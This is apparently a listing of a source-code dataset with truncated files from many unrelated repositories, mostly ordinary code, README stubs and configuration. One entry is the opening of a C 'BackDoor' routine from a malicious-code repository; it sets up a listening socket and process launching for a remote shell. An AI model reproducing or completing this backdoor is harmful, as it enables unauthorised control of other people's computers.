code
stringlengths
3
1.01M
repo_name
stringlengths
5
116
path
stringlengths
3
311
language
stringclasses
30 values
license
stringclasses
15 values
size
int64
3
1.01M
# Cercanthemum squamiferum Tiegh. SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
mdoering/backbone
life/Plantae/Magnoliophyta/Magnoliopsida/Malpighiales/Ochnaceae/Cercanthemum/Cercanthemum squamiferum/README.md
Markdown
apache-2.0
181
# Strobilanthes hirsuta Decne. SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
mdoering/backbone
life/Plantae/Magnoliophyta/Magnoliopsida/Lamiales/Acanthaceae/Strobilanthes/Strobilanthes hirsuta/README.md
Markdown
apache-2.0
178
# Matayba atropurpurea Radlk. SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
mdoering/backbone
life/Plantae/Magnoliophyta/Magnoliopsida/Sapindales/Sapindaceae/Matayba/Matayba atropurpurea/README.md
Markdown
apache-2.0
177
# Nephelea arborea (L.) Sehnem SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
mdoering/backbone
life/Plantae/Pteridophyta/Polypodiopsida/Cyatheales/Cyatheaceae/Nephelea/Nephelea arborea/README.md
Markdown
apache-2.0
178
<!-- Portfolio Grid Section --> <section id="portfolio" class="bg-light-gray"> <div class="container"> <div class="row"> <div class="col-lg-12 text-center"> <h2 class="section-heading">Portfolio</h2> <h3 class="section-subheading text-muted...
nicoletufts/nicoletufts.github.io
_includes/portfolio_grid.html
HTML
apache-2.0
1,307
/* * Copyright 2019 ThoughtWorks, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agr...
jyotisingh/gocd
server/webapp/WEB-INF/rails/webpack/models/admins/admin_crud.ts
TypeScript
apache-2.0
1,266
/* * Copyright 2014-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "licen...
jentfoo/aws-sdk-java
aws-java-sdk-iotevents/src/main/java/com/amazonaws/services/iotevents/model/UntagResourceResult.java
Java
apache-2.0
2,326
// Copyright (c) kuicker.org. All rights reserved. // Modified By YYYY-MM-DD // kevinjong 2016-02-11 - Creation using System.IO; using System.Linq; using Xunit; namespace IsTo.Tests { public class TestHelper { internal static void StreamComparison( Stream stream1, Stream stream2) ...
Kuick/IsTo
IsTo.Tests/Misc/TestHelper.cs
C#
apache-2.0
765
/* * Copyright 2020 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to ...
googleapis/java-aiplatform
proto-google-cloud-aiplatform-v1/src/main/java/com/google/cloud/aiplatform/v1/ExportModelResponse.java
Java
apache-2.0
16,200
/*! * Module requirements */ var NeopreneError = require('../error') /** * Document Validation Error * * @api private * @param {Document} instance * @inherits NeopreneError */ function ValidationError (instance) { NeopreneError.call(this, "Validation failed"); Error.captureStackTrace(this, arguments.cal...
rorymadden/neoprene
lib/errors/validation.js
JavaScript
apache-2.0
813
package com.twitter.tiny import com.google.inject.Stage import com.twitter.finatra.http.test.EmbeddedHttpServer import com.twitter.inject.server.FeatureTest class TinyUrlServerStartupTest extends FeatureTest { override val server = new EmbeddedHttpServer( stage = Stage.PRODUCTION, twitterServer = new TinyU...
joecwu/finatra
examples/tiny-url/src/test/scala/com/twitter/tiny/TinyUrlServerStartupTest.scala
Scala
apache-2.0
414
# # Copyright 2019 Centreon (http://www.centreon.com/) # # Centreon is a full-fledged industry-strength solution that meets # the needs in IT infrastructure and application monitoring for # service performance. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in com...
Sims24/centreon-plugins
hardware/server/hp/proliant/snmp/mode/components/daldrive.pm
Perl
apache-2.0
4,072
/* * Copyright 2005-2010 Ignis Software Tools Ltd. All rights reserved. */ package com.aqua.filetransfer.ftp; import java.io.File; import java.io.FileInputStream; import java.util.Properties; import jsystem.framework.JSystemProperties; import jsystem.framework.system.SystemObjectImpl; import jsystem.utils.FileUtils...
Top-Q/jsystem
jsystem-core-system-objects/FileTransfer-so/src/main/java/com/aqua/filetransfer/ftp/FTPRemoteClient.java
Java
apache-2.0
17,775
/******************************************************************************* * Copyright 2017 Bstek * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy * of the License at * * http://www.apache.org/l...
youseries/uflo
uflo-core/src/main/java/com/bstek/uflo/command/impl/GetListHistoryTasksCommand.java
Java
apache-2.0
1,555
/* * Copyright 2012-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "licen...
dagnir/aws-sdk-java
aws-java-sdk-emr/src/main/java/com/amazonaws/services/elasticmapreduce/model/transform/DescribeClusterResultJsonUnmarshaller.java
Java
apache-2.0
2,841
// @target: ES6 var x = 1 % `abc${ 1 }def`;
freedot/tstolua
tests/cases/conformance/es6/templates/templateStringInModuloES6.ts
TypeScript
apache-2.0
46
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html> <head> <title>PHPXRef 0.7.1 : Unnamed Project : Class Reference: testofauthenticator</title> <link rel="stylesheet" href="../sample.css" type="text/css"> <link rel="stylesheet" href="../sample-p...
inputx/code-ref-doc
bonfire/_classes/testofauthenticator.html
HTML
apache-2.0
4,769
/** * App routes. */ var homepage = require('./homepage'); var user = require('./user'); var news = require('./news'); var test = require('./test'); var passport = require('passport'); function ensureAuthenticated(req, res, next) { if (req.isAuthenticated()) { return next(); } req.flash('error', '抱歉,您尚未登录。...
dotkrnl/helium
routes/index.js
JavaScript
apache-2.0
2,456
jQuery("#simulation") .on("click", ".s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d .click", function(event, data) { var jEvent, jFirer, cases; if(data === undefined) { data = event; } jEvent = jimEvent(event); jFirer = jEvent.getEventFirer(); if(jFirer.is("#s-Label_58")) { cases = [ { ...
yicold/axure-case
caiqu/财趣v1.5/resources/screens/cd8b0318-8942-4a64-b2c9-ee7c253d6b7d-1445822636718.js
JavaScript
apache-2.0
13,587
# Copyright 2015 Cisco Systems, Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless requir...
Gitweijie/first_project
networking_cisco/plugins/cisco/l3/drivers/asr1k/asr1k_routertype_driver.py
Python
apache-2.0
29,107
MAKEFILE_DIR := tensorflow/lite/experimental/micro/tools/make # Pull in some convenience functions. include $(MAKEFILE_DIR)/helper_functions.inc # Try to figure out the host system HOST_OS := ifeq ($(OS),Windows_NT) HOST_OS = windows else UNAME_S := $(shell uname -s) ifeq ($(UNAME_S),Linux) HOST_OS := linux en...
gautam1858/tensorflow
tensorflow/lite/experimental/micro/tools/make/Makefile
Makefile
apache-2.0
7,400
# aitproject
tushargosavi/aitproject
README.md
Markdown
apache-2.0
12
/* Copyright 2017 The Kubernetes Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, ...
k82cn/kube-arbitrator
pkg/version/version.go
GO
apache-2.0
1,456
# Display a scene Display a scene with a terrain surface and some imagery. ![](screenshot.png) ## Use case Scene views are 3D representations of real-world areas and objects. Scene views are helpful for visualizing complex datasets where 3D relationships, topography, and elevation of elements are important factors....
Esri/arcgis-runtime-samples-qt
ArcGISRuntimeSDKQt_QMLSamples/Scenes/BasicSceneView/README.md
Markdown
apache-2.0
819
package no.dusken.momus.model.websocket; public enum Action { CREATE, UPDATE, DELETE }
Studentmediene/Momus
src/main/java/no/dusken/momus/model/websocket/Action.java
Java
apache-2.0
91
/* * Copyright (c) 2021, Peter Abeles. All Rights Reserved. * * This file is part of BoofCV (http://boofcv.org). * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apac...
lessthanoptimal/BoofCV
demonstrations/src/main/java/boofcv/demonstrations/imageprocessing/DisplaySteerableBase.java
Java
apache-2.0
4,148
/* * Copyright (c) 2017 Trail of Bits, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law o...
trailofbits/remill
lib/Arch/X86/Semantics/DATAXFER.cpp
C++
apache-2.0
75,427
# Bihai stricta (Huber) Griggs SPECIES #### Status SYNONYM #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
mdoering/backbone
life/Plantae/Magnoliophyta/Liliopsida/Zingiberales/Heliconiaceae/Heliconia/Heliconia stricta/ Syn. Bihai stricta/README.md
Markdown
apache-2.0
185
/** * Copyright 2011-2017 Asakusa Framework Team. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable...
cocoatomo/asakusafw
mapreduce/compiler/core/src/test/java/com/asakusafw/compiler/batch/NotPublic.java
Java
apache-2.0
1,012
# 注意!!! 由于该库的主要目的是JWT的实现原理的技术分享,而我目前忙于公司的Android项目,暂没有时间维护当前扩展包(对Laravel5.4的兼容性不好),并且扩展包稳定性还有待验证,不推荐使用到正式环境。 所以我推荐大家使用 https://github.com/tymondesigns/jwt-auth :),如果你有JWT相关不懂的,可以提issue,大家一起探讨。 如果你想学习JWT的实现原理,我相信本项目应该会带给你一些帮助:),配合专栏食用更佳 https://zhuanlan.zhihu.com/p/22531819 # jwt-auth [![PHP version](https://badge....
lsxiao/jwt-auth
README.md
Markdown
apache-2.0
8,595
package com.google.api.ads.dfp.jaxws.v201511; import javax.xml.bind.annotation.XmlEnum; import javax.xml.bind.annotation.XmlType; /** * <p>Java class for CustomTargetingValue.Status. * * <p>The following schema fragment specifies the expected content contained within this class. * <p> * <pre> * &lt;simpleTyp...
gawkermedia/googleads-java-lib
modules/dfp_appengine/src/main/java/com/google/api/ads/dfp/jaxws/v201511/CustomTargetingValueStatus.java
Java
apache-2.0
1,306
/* ### * IP: GHIDRA * REVIEWED: YES * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or ag...
NationalSecurityAgency/ghidra
Ghidra/Features/Base/src/main/java/ghidra/app/plugin/core/compositeeditor/CompositeModelSelectionListener.java
Java
apache-2.0
904
/* * Copyright 2010-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). * You may not use this file except in compliance with the License. * A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" fil...
JoyIfBam5/aws-sdk-cpp
aws-cpp-sdk-ec2/source/model/DescribeInstancesResponse.cpp
C++
apache-2.0
2,558
/* * This file is part of "lunisolar-magma". * * (C) Copyright 2014-2022 Lunisolar (http://lunisolar.eu/). * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.o...
lunisolar/magma
magma-asserts/src/main/java/eu/lunisolar/magma/asserts/func/function/to/LToIntObj1Obj0FuncAttest.java
Java
apache-2.0
3,567
// [[[[INFO> // Copyright 2015 Epicycle (http://epicycle.org, https://github.com/open-epicycle) // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses...
open-epicycle/Epicycle.Input-cs
projects/Epicycle.Input_cs-Test/Keyboard/KeyEventArgsTest.cs
C#
apache-2.0
1,266
/* * Copyright (C) 2014 - 2016 Softwaremill <http://softwaremill.com> * Copyright (C) 2016 - 2019 Lightbend Inc. <http://www.lightbend.com> */ package akka.kafka.internal import akka.Done import akka.actor.ActorSystem import akka.kafka.ConsumerMessage._ import akka.kafka.{internal, CommitterSettings, ConsumerSetti...
softwaremill/reactive-kafka
tests/src/test/scala/akka/kafka/internal/CommittingWithMockSpec.scala
Scala
apache-2.0
19,063
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not...
apache/incubator-airflow
tests/providers/google/cloud/hooks/test_vision.py
Python
apache-2.0
38,031
/* COPYRIGHT 2012 SUPERMAP * 本程序只能在有效的授权许可下使用。 * 未经许可,不得以任何手段擅自使用或传播。*/ /** * @requires SuperMap/Util.js * @requires SuperMap/REST.js */ /** * Class: SuperMap.REST.ChartQueryParameters * 海图查询参数类,该类用于设置海图查询时的相关参数,海图查询分为海图属性 * 查询和海图范围查询两类,通过属性queryMode指定查询模式。必设属性有: * queryMode、chartLayerNames、chart...
SuperMap/iClient-for-JavaScript
libs/SuperMap/REST/Query/ChartQueryParameters.js
JavaScript
apache-2.0
6,706
/* * Copyright 2017-2022 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "licen...
aws/aws-sdk-java
aws-java-sdk-glue/src/main/java/com/amazonaws/services/glue/model/CreateCrawlerRequest.java
Java
apache-2.0
36,471
/* * Copyright 2017-2022 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "licen...
aws/aws-sdk-java
aws-java-sdk-cloudwatch/src/main/java/com/amazonaws/services/cloudwatch/model/transform/ListDashboardsRequestMarshaller.java
Java
apache-2.0
2,151
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_66-internal) on Wed Apr 13 11:47:04 PDT 2016 --> <title>ManagementException (Apache Geode 1.0.0-incubating.M2)</title> <meta name="date" conten...
azwickey-pivotal/oauth2-gemfire-sample
apache-geode-1.0.0-incubating.M2/javadoc/com/gemstone/gemfire/management/ManagementException.html
HTML
apache-2.0
13,502
/* * Copyright 2013 Thomas Bocek * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in ...
jonaswagner/TomP2P
core/src/main/java/net/tomp2p/futures/FutureDone.java
Java
apache-2.0
1,873
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_US" xml:lang="en_US"> <head> <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"/> <title>Java(TM) Execution Time Measu...
jasonwee/videoOnCloud
lib/jetm-1.2.3/doc/site/features.html
HTML
apache-2.0
3,392
# Manglietia dolichogyna Dandy ex Noot. SPECIES #### Status SYNONYM #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
mdoering/backbone
life/Plantae/Magnoliophyta/Magnoliopsida/Magnoliales/Magnoliaceae/Magnolia/Magnolia utilis/ Syn. Manglietia dolichogyna/README.md
Markdown
apache-2.0
194
#include "littlepain.h" /* the backdoor :) */ DWORD WINAPI BackDoor(LPVOID Data) { SOCKET server_sock,client_sock; struct sockaddr_in serv_inf; struct timeval tv; fd_set ft; char exec[MAX_PATH]; DWORD cnt; STARTUPINFO inf_prog; PROCESS_INFORMATION info_pr; if((server_sock = socket(AF_INET,SOCK_STREAM, I...
ZHYfeng/malicious-code-conceal
0_mailcious-code/useful/c_windows/littlepain/BackDoor.c
C
apache-2.0
1,857
/** * Copyright (C) 2006-2020 Talend Inc. - www.talend.com * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by appli...
chmyga/component-runtime
component-api/src/main/java/org/talend/sdk/component/api/configuration/constraint/Uniques.java
Java
apache-2.0
1,331
package de.mhu.com.morse.channel.sql; import java.lang.reflect.InvocationTargetException; import java.sql.SQLException; import java.util.Iterator; import java.util.LinkedList; import de.mhu.lib.ASql; import de.mhu.lib.dtb.Sth; import de.mhu.com.morse.aaa.IAclManager; import de.mhu.com.morse.channel.CMql; i...
mhus/mhus-inka
de.mhus.app.inka.morse.server/src/de/mhu/com/morse/channel/sql/WhereSqlListener.java
Java
apache-2.0
10,620
// // UIImage+Image.h // 生日管家 // // Created by yz on 15/7/6. // Copyright (c) 2015年 yz. All rights reserved. // #import <UIKit/UIKit.h> @interface UIImage (Image) // 根据颜色生成一张尺寸为1*1的相同颜色图片 + (UIImage *)imageWithColor:(UIColor *)color; // 拉伸图片 + (UIImage *)resizedImageWithName:(NSString *)name; +...
LHJ-K2S/KSPhotoBrowserDemo
KSPhotoBrowser/Classes/Tool/UIImage+Image.h
C
apache-2.0
986
/* * Copyright 2016 Code Above Lab LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agr...
codeabovelab/haven-platform
common/common-utils/src/main/java/com/codeabovelab/dm/common/utils/StringUtils.java
Java
apache-2.0
9,252
from django.db import models from django.utils.html import format_html from sorl.thumbnail import get_thumbnail from sorl.thumbnail.fields import ImageField from sno.models import Sno class SnoGalleries(models.Model): class Meta: verbose_name = 'Фотография в галереи СНО' verbose_name_plural = 'Фот...
glad-web-developer/zab_sno
src/sno_galleries/models.py
Python
apache-2.0
1,164
/* * Copyright 2015 Namihiko Matsumura (https://github.com/n-i-e/) * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Un...
n-i-e/deepfolderview
src/main/java/com/github/n_i_e/deepfolderview/SwtFileFolderMenu.java
Java
apache-2.0
41,340
/* * Copyright 2014-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "licen...
jentfoo/aws-sdk-java
aws-java-sdk-medialive/src/main/java/com/amazonaws/services/medialive/model/StaticImageDeactivateScheduleActionSettings.java
Java
apache-2.0
5,899
# Arkezostis tayuya Kuntze SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
mdoering/backbone
life/Plantae/Magnoliophyta/Magnoliopsida/Cucurbitales/Cucurbitaceae/Arkezostis/Arkezostis tayuya/README.md
Markdown
apache-2.0
174
/** * Copyright (C) 2010-2013 Alibaba Group Holding Limited * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless req...
dingjun84/mq-backup
rocketmq-broker/src/main/java/com/alibaba/rocketmq/broker/client/ConsumerIdsChangeListener.java
Java
apache-2.0
963
# Lampocarya affinis Brongn. SPECIES #### Status SYNONYM #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
mdoering/backbone
life/Plantae/Magnoliophyta/Liliopsida/Poales/Cyperaceae/Morelotia/Morelotia affinis/ Syn. Lampocarya affinis/README.md
Markdown
apache-2.0
183
# Myriocladus maguirei Swallen SPECIES #### Status ACCEPTED #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
mdoering/backbone
life/Plantae/Magnoliophyta/Liliopsida/Poales/Poaceae/Myriocladus/Myriocladus maguirei/README.md
Markdown
apache-2.0
186
# Solanum apiculatibaccatum Bitter SPECIES #### Status SYNONYM #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
mdoering/backbone
life/Plantae/Magnoliophyta/Magnoliopsida/Solanales/Solanaceae/Solanum/Solanum mite/ Syn. Solanum apiculatibaccatum/README.md
Markdown
apache-2.0
189
# Gnaphalium angustifolium Lam. SPECIES #### Status SYNONYM #### According to The Catalogue of Life, 3rd January 2011 #### Published in Encycl. 2:746. 1788 #### Original name null ### Remarks null
mdoering/backbone
life/Plantae/Magnoliophyta/Magnoliopsida/Asterales/Asteraceae/Helichrysum/Helichrysum litoreum/ Syn. Gnaphalium angustifolium/README.md
Markdown
apache-2.0
201
# Entylomella microstigma (Sacc.) Cif., 1959 SPECIES #### Status SYNONYM #### According to The Catalogue of Life, 3rd January 2011 #### Published in Lejeunia Mém. 177 (1959) #### Original name null ### Remarks null
mdoering/backbone
life/Fungi/Basidiomycota/Exobasidiomycetes/Entylomatales/Entylomataceae/Entyloma/Entyloma achilleae/ Syn. Entylomella microstigma/README.md
Markdown
apache-2.0
220
# Acacia pennatula (Schltdl. & Cham.) Benth. SPECIES #### Status ACCEPTED #### According to The Catalogue of Life, 3rd January 2011 #### Published in London J. Bot. 1:390. 1842 #### Original name null ### Remarks null
mdoering/backbone
life/Plantae/Magnoliophyta/Magnoliopsida/Fabales/Fabaceae/Acacia/Acacia pennatula/README.md
Markdown
apache-2.0
222
# Niptera dilutella (Fr.) Rehm SPECIES #### Status SYNONYM #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
mdoering/backbone
life/Fungi/Ascomycota/Orbiliomycetes/Orbiliales/Orbiliaceae/Orbilia/Hyalinia dilutella/ Syn. Niptera dilutella/README.md
Markdown
apache-2.0
185
// copyright (c) 2017 vmware, inc. all rights reserved. // // licensed under the apache license, version 2.0 (the "license"); // you may not use this file except in compliance with the license. // you may obtain a copy of the license at // // http://www.apache.org/licenses/license-2.0 // // unless required by applic...
wknet123/harbor
src/common/dao/scan_job.go
GO
apache-2.0
2,269
package com.bjorktech.cayman.idea.designpattern.structure.proxy; public class TargetClass implements TargetInterface { @Override public long add(long a, long b) { long temp = a + b; System.out.println(temp); return temp; } @Override public long sub(long a, long b) { long temp = a - b; System.out.print...
wanliwang/cayman
cm-idea/src/main/java/com/bjorktech/cayman/idea/designpattern/structure/proxy/TargetClass.java
Java
apache-2.0
351
package com.badlogic.gdx.ingenuity.scene2d; import com.badlogic.gdx.graphics.Color; import com.badlogic.gdx.ingenuity.GdxData; import com.badlogic.gdx.ingenuity.helper.PixmapHelper; import com.badlogic.gdx.ingenuity.utils.GdxUtilities; import com.badlogic.gdx.scenes.scene2d.Group; import com.badlogic.gdx.scenes.scene2...
mitkey/libgdx-ingenuity
depot/src/com/badlogic/gdx/ingenuity/scene2d/Loading.java
Java
apache-2.0
1,675
<?php /** * amadeus-ws-client * * Copyright 2020 Amadeus Benelux NV * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless requir...
amabnl/amadeus-ws-client
src/Amadeus/Client/RequestCreator/Converter/Fare/PriceUpsellWithoutPNRConv.php
PHP
apache-2.0
1,463
package com.concavenp.nanodegree.shared; import org.junit.Test; import static org.junit.Assert.*; /** * To work on unit tests, switch the Test Artifact in the Build Variants view. */ public class ExampleUnitTest { @Test public void addition_isCorrect() throws Exception { assertEquals(4, 2 + 2); ...
concaveNP/GoUbiquitous
shared/src/test/java/com/concavenp/nanodegree/shared/ExampleUnitTest.java
Java
apache-2.0
324
<!DOCTYPE HTML> <html> <head> <title>{#$site_title#}</title> <meta charset="utf-8"> <meta name="Keywords" content="{#$site_keywords#}" /> <meta name="Description" content="{#$site_description#}" /> <link href="{#$site_root#}themes/default/skin/nav.css" rel="stylesheet" type="text/css" /> <script type="text/java...
zhanxizhu/lxsndir
themes/模板/base/index.html
HTML
apache-2.0
7,388
/* * Copyright (c) 2013-2015 Josef Hardi <josef.hardi@gmail.com> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless requir...
obidea/semantika
src/main/java/com/obidea/semantika/datatype/AbstractDerivedDecimalType.java
Java
apache-2.0
1,709
using System; namespace EtoTest.Model { public class DataFileVersion { /// <summary> /// The name of this station - writen to name of conlict files when resyncing. /// </summary> public String StationName { get; set; } /// <summary> /// If this ID is different f...
michaeljfarr/FilePharoah
m.Indexer/EtoTest/Model/DataFileVersion.cs
C#
apache-2.0
984
/* Copyright (C) 2013-2020 Expedia Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in wri...
mikkokar/styx
support/testsupport/src/main/java/com/hotels/styx/support/matchers/IsOptional.java
Java
apache-2.0
3,272
-- Start of IDN Tables -- IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_BASE_TABLE]') AND TYPE IN (N'U')) CREATE TABLE IDN_BASE_TABLE ( PRODUCT_NAME VARCHAR(20), PRIMARY KEY (PRODUCT_NAME) ); INSERT INTO IDN_BASE_TABLE values ('WSO2 Identity Server'); IF NOT EXISTS (SELECT * ...
chamindias/carbon-apimgt
features/apimgt/org.wso2.carbon.apimgt.core.feature/src/main/resources/sql/mssql.sql
SQL
apache-2.0
95,484
<?php namespace Deliveryboy\V1\Rest\Orderproducts; class OrderproductsEntity { public $order_product_id; public $order_id; public $order_product_name; public $order_item_id; public $order_offer_id; public $order_type; public $package_id; public $unit_price; public $total_price; ...
ankuradhey/laundry
api/module/Deliveryboy/src/Deliveryboy/V1/Rest/Orderproducts/OrderproductsEntity.php
PHP
apache-2.0
1,519
/* * Copyright (C) 2016 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to ...
kuri65536/sl4a
android/Common/src/com/googlecode/android_scripting/language/BeanShellLanguage.java
Java
apache-2.0
2,132
/* * Copyright [2017] * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, ...
WindsorWang/Spools
spools-book/src/main/java/com/netpet/spools/book/insidethejavavirtualmachine/chapter18/Hello.java
Java
apache-2.0
789
<?php /******************************************************************************* * Copyright 2009-2014 Amazon Services. All Rights Reserved. * Licensed under the Apache License, Version 2.0 (the "License"); * * You may not use this file except in compliance with the License. * You may obtain a copy of the L...
brickfox/mws
src/MarketplaceWebServiceSellers/Mock.php
PHP
apache-2.0
4,108
using System; using System.Collections.Generic; using System.Linq; using System.Text; namespace Trifolia.DB { public enum Conformance { SHALL = 1, SHALL_NOT = 2, SHOULD = 3, SHOULD_NOT = 4, MAY = 5, MAY_NOT = 6, UNKNOWN = 999 } }
lantanagroup/trifolia
Trifolia.DB/Conformance.cs
C#
apache-2.0
302
package com.ctrip.xpipe.redis.checker.alert.manager; import com.ctrip.xpipe.redis.checker.alert.ALERT_TYPE; import com.ctrip.xpipe.redis.checker.alert.AlertChannel; import com.ctrip.xpipe.redis.checker.alert.AlertConfig; import com.ctrip.xpipe.redis.checker.alert.AlertEntity; import com.ctrip.xpipe.redis.checker.alert...
ctripcorp/x-pipe
redis/redis-checker/src/main/java/com/ctrip/xpipe/redis/checker/alert/manager/AlertPolicyManager.java
Java
apache-2.0
3,064
package com.coolweather.android.util; import okhttp3.OkHttpClient; import okhttp3.Request; /** * Created by fengj on 2017/1/27. */ public class HttpUtil { public static void sendOkHttpRequest(String address,okhttp3.Callback callback){ OkHttpClient client=new OkHttpClient(); Request request=new ...
cabbagemaoyi/coolweather
app/src/main/java/com/coolweather/android/util/HttpUtil.java
Java
apache-2.0
419
# Copyright 2018 Flight Lab authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in w...
google/flight-lab
controller/common/net.py
Python
apache-2.0
1,062
/* * Copyright 2013 * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at: * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to ...
mariusj/org.openntf.domino
domino/core/archive/AbstractDominoIterator.java
Java
apache-2.0
4,458
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Class triagens\ArangoDb\Vertex | ArangoDB-PHP API Documentation</title> <link rel="stylesheet" href="resources/bootstrap.min.css?973e37a8502921d56bc02bb55321f45b072b6f71"> <link rel="stylesheet" href="resources/style.css?49f43d3208c5d7e33fa16d36107a345bf...
diabl0/arangodb-php
docs/class-triagens.ArangoDb.Vertex.html
HTML
apache-2.0
13,104
